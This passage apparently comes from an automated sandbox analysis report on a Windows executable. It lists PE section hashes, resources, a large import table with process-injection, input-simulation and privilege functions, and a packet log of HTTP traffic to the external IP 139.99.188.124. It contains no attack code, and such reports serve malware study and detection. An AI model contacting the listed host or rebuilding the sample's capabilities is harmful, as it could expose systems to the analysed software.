                                                                    .pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0xfb000 | 0x140f4 | 0x14200 | 03206aeaa57454f7e12edff9a0f98715 | False | 0.193359375 | data | 4.245963827119573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x110000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xfb458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xfb580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xfb6a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xfb7d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905
RT_MENU | 0x10bff8 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0x10c048 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0x10c5dc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0x10cc68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0x10d0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0x10d6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0x10dd50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0x10e1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0x10e310 | 0x8c6 | data | | | 1.0048975957257347
RT_GROUP_ICON | 0x10ebd8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10ebec | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10ec00 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10ec14 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10ec28 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10ed04 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 18, 2024 09:19:19.559770107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.560158014 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.564244986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.564316034 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.564526081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.568870068 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.569135904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.569200039 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.573158026 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.573285103 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.573362112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.577681065 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.577827930 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.577881098 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.582195044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.582371950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.582429886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.587204933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.587346077 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.587409019 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.592494011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.592525959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.592595100 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.596820116 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.596947908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.596999884 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.600747108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.600877047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.600929022 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.604734898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.604840994 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.604892015 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.609213114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.609364986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.609411955 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.613739014 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.613874912 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.613950014 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.720458031 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.720654011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.720715046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.722275019 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.722383022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.722453117 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.725878954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.725991964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.726155043 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.729528904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.729655981 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.729777098 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.733105898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.733247995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.733290911 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.736577988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.736670971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.736851931 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.739986897 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.740109921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.740199089 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.743428946 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.743529081 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.743592024 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.746777058 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.746877909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.747179031 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.750112057 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.750281096 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.750410080 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.753446102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.753547907 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.753643036 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.756886959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.756952047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.757025957 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.760286093 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.760488033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.760631084 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.763561010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.763679028 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.763734102 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.766891956 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.767014027 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.767071009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.770248890 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.770334959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.770435095 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.773591995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.773695946 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.773750067 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.776951075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.777095079 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.777149916 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.780343056 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.780639887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.780703068 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.783621073 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.783755064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.783838034 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.787110090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.787173986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.787244081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.790477037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.790549994 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.790611982 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.793814898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.793843985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.794130087 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.797035933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.797137976 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.797288895 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.800407887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.800559998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.800612926 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.803744078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.803885937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.803942919 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.807128906 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.807209015 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.807351112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.810462952 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.810585022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.810636044 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.813802958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.813927889 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.814115047 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.817153931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.817301035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.817436934 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.820595980 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.820655107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.820713043 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.823898077 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.823971033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.824042082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.827235937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.827342987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.827408075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.830632925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.830677986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.830776930 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.833987951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.834134102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.834180117 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.837490082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.837507963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.837567091 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.840647936 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.840728998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.840797901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.843975067 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.844089985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.844142914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.847381115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.847440958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.847508907 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.934142113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934257030 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934293985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934314013 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.934330940 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934420109 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.936659098 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.936744928 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.936788082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.939268112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.939376116 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.939415932 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.941541910 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.941643000 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.941732883 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.943953991 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.943967104 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.944011927 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.946355104 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.946484089 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.946530104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.951200962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.951217890 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.951260090 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.951812029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.952313900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.952373981 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.954535007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.954668045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.954760075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.956662893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.956937075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.957019091 CET4972180192.168.2.6139.99.188.124
